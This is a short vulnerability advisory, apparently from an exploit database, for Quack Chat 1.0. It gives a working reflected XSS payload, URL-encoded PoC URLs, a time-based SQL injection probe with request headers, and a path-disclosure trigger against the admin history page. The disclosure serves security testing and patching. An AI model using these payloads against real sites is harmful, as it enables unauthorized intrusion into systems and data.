########################################################################################### # Exploit Title: Quack Chat 1.0 - XSS / SQL Injection / Path Diclosure # Date: 15 de Agosto del 2013 # Exploit Author: Dylan Irzi # Credit goes for: websecuritydev.com # Vendor Homepage: http://www.quack-chat.com/ # Tested on: Win8 & Linux Mint # Affected Version : 1.0 # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/} # Greetz: All team WebSecuritydev. ########################################################################################### Cross Site Scripting: Archivos Afectados Afectados qchat.php qc_admin/index.php?p=history PoC: localhost/qchat.php Vector: ""><img src=x onerror=prompt(/XSS/);>> Input: <input id="name" type="text" style="width:200px;" name="name"> Is Reflected: localhost/qc_admin/index.php?p=history PoC #2: localhost/qc_admin/index.php?p=history&page=2+(XSS Vector) Example: localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E ------------------------------------------------------------------- SQL Injection localhost/qc_admin/index.php?p=history&id=(SQL Injection) localhost/qc_admin/index.php?p=history&page=(SQL Injection) # Exploit-DB note: Here's a PoC: # <server>/qc_admin/index.php?p=history&id=1 and sleep(10) Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e (Remplazar por una Session Cookie Valida) ------------------------------------------------------------------- Path Diclosure localhost/qc_admin/index.php?p=history&id=' in /var/www/chat/qc_admin/index.php on line 249 -------------------------------------------------------------------- *By Dylan Irzi @Dylan_Irzi11 Pentest de Seguridad. *Брой прочитания на тази страница: 945
Quack Chat 1.0 – Multiple Vulnerabilities